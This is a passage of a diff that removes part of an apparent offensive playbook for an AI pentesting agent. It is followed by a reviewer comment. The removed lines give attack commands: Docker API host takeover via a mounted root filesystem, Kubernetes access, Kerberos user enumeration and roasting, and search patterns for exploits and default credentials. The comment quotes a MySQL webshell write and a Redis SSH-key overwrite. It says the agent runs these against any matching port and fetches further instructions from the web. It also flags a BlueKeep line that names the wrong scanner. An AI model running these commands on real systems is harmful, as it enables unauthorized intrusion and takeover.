208
-
209
- Docker API (2375/2376):
210
- ├── curl http://TARGET:2375/images/json (if unauthenticated)
211
- ├── Full RCE: docker -H tcp://TARGET:2375 run -v /:/mnt alpine chroot /mnt
212
- └── Kubernetes: kubectl --server=https://TARGET:6443 get pods
213
-
214
- Kerberos (88):
215
- ├── User enumeration: kerbrute userenum --dc DC -d DOMAIN users.txt
216
- ├── AS-REP roasting: impacket-GetNPUsers (see ad-attack.md)
217
- ├── Kerberoasting: impacket-GetUserSPNs (see ad-attack.md)
218
- └── web_search("kerberos attack techniques {year}")
219
- ```
220
-
221
- ## Universal Service Search Pattern
222
- ```
223
- web_search("{service_name} {version} exploit hacktricks")
224
- web_search("{service_name} pentesting cheatsheet")
225
- web_search("{service_name} {version} CVE PoC")
226
- web_search("{service_name} default credentials")
227
- web_search("{service_name} security misconfiguration")
228
- searchsploit {service_name} {version}
229
- ```
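Review bot: if network-svc.md is being re-homed rather than dropped, the RDP line `BlueKeep: nmap -Pn --script rdp-vuln-ms12-020 -p 3389 TARGET` is wrong: the rdp-vuln-ms12-020 NSE script tests MS12-020 (CVE-2012-0002), not BlueKeep (CVE-2019-0708), so a scan built from that line checks a different bug and says nothing about BlueKeep. The same file carries the directly destructive one-liners the agent is told to run against any matching port (MySQL `INTO OUTFILE '/var/www/html/cmd.php'`, Redis `CONFIG SET dir /root/.ssh` followed by `SAVE`, `docker -H tcp://TARGET:2375 run -v /:/mnt alpine chroot /mnt`), and nearly every branch ends in a `web_search(...)` or `browse_url(...)` call that pulls further instructions from the web at run time; since this deletion hunk is the last place those instructions are visible in the package, the release notes should state whether 0.90.1 still executes them and from what source.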